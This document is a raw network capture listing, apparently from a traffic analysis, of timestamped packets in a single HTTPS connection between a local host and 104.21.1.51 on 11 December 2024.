Dec 11, 2024 12:29:31.988723040 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.988723040 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.988730907 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.988852024 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.988852024 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.990526915 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.990536928 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.990708113 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.990708113 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.990717888 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.990731001 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.990780115 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.990878105 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.992130041 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.992137909 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.992295027 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.992295027 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.992305040 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.992342949 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.992444038 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.994959116 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.994966984 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.995157957 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.995167017 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.995239019 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.995239019 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.996886015 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.996918917 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.997093916 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.997102976 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.997117043 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.997172117 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.997172117 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.998810053 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.998845100 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.999007940 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.999007940 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.999017954 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:31.999030113 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.999030113 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:31.999102116 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.000835896 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.000847101 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.001033068 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.001041889 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.001142025 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.001142025 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.003146887 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.003179073 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.003349066 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.003349066 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.003359079 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.003370047 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.003370047 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.003488064 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.003489971 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.003660917 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.003664017 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.003844023 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.032429934 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.036994934 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.167398930 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.167407990 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.167579889 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.167579889 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.167612076 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.167612076 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.167617083 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.167751074 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.167803049 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.169334888 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.169343948 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.169595957 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.169595957 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.169605970 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.169806004 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.171278954 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.171288013 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.171487093 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.171487093 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.171487093 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.171498060 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.171601057 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.171725035 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.173146963 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.173175097 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.173372030 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.173372030 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.173372030 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.173382998 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.173439980 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.173439980 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.173602104 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.175348997 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.175359964 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.175545931 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.175545931 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.175556898 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.175561905 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.175637960 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.175761938 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.176883936 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.176944971 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.177038908 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.177038908 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.177072048 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.177077055 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.177201986 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.178390026 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.178399086 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.178623915 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.178623915 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.178633928 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.178694963 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.181144953 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.181154966 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.181360960 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.181360960 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.181370974 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.181376934 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.181440115 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.183021069 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.183029890 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.183208942 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.183208942 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.183218002 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.183309078 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.183309078 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.184986115 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.184994936 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.185172081 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.185172081 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.185182095 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.185273886 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.185273886 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.186705112 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.186714888 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.186882973 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.186882973 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.186892986 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.186899900 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.186899900 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.186979055 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.186979055 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.189182043 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.189192057 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.189393044 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.189393044 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.189403057 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.189409971 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.189409971 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.189486980 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.191159964 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.191169024 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.191363096 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.191363096 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.191370964 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.191381931 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.191457033 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.191507101 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.193238974 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.193248034 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.193451881 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.193479061 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.193542004 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.193684101 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.194688082 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.194696903 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.194886923 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.194886923 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.194895029 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.194961071 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.195044994 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.195092916 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.197197914 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.197207928 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.197391033 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.197391033 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.197443008 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.197452068 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.197463036 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.197463036 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.197638035 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.199331999 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.199342966 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.199538946 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.199538946 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.199549913 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.199593067 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.199692011 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.199851036 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.201088905 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.201097965 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.201292038 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.201292038 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.201302052 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.201435089 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.201515913 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.203368902 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.203377962 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.203469992 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.203612089 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.203612089 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.203622103 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.203705072 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.203866005 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.205360889 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.205368996 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.205565929 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.205565929 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.205576897 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.205581903 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.205713034 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.205841064 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.207266092 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.207276106 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.207485914 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.207583904 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.207592964 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.207818985 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.208626986 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.209141016 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.209150076 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.209336996 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.209336996 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.209433079 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.209433079 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.209439039 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.209758043 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.211126089 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.211136103 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.211325884 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.211325884 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.211441994 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.211447001 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.211639881 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.213399887 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.213433981 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.213608980 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.213660002 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.213660002 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.213665962 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.213845968 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.215320110 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.215328932 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.215533972 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.215555906 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.215559959 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.215653896 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.215744972 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.217343092 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.217353106 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.217547894 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.217674971 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.217679977 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.217850924 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.219192982 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.219202042 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.219360113 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.219388962 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.219388962 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.219408035 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.219455957 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.219628096 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.221056938 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.221066952 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.221215963 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.221215963 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.221223116 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.221339941 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.221339941 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.223468065 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.223491907 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.223686934 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.223686934 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.223694086 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.223737001 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.223893881 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.225236893 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.225246906 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.225460052 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.225460052 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.225460052 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.225466967 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.225611925 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.225689888 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.227277994 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.227288008 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.227458000 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.227458000 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.227561951 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.227566004 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.227729082 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.230735064 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.230745077 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.230940104 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.230988026 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.230988026 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.230998039 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.231168032 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.232022047 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.232032061 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.232089996 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.232297897 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.232297897 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.232306957 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.232351065 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.232402086 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.285897970 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.372076988 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.399524927 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.399538040 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.399823904 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.399842024 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.399849892 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.400053024 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.400688887 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.401226044 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.401238918 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.401422024 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.401482105 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.401488066 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.401530981 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.401652098 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.402940035 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.402951956 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.403146029 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.403146029 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.403161049 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.403161049 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.403167963 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.403242111 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.403342009 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.404762030 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.404774904 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.404994965 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.404994965 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.405008078 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.405016899 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.405232906 CET	49755	443	192.168.11.20	104.21.1.51
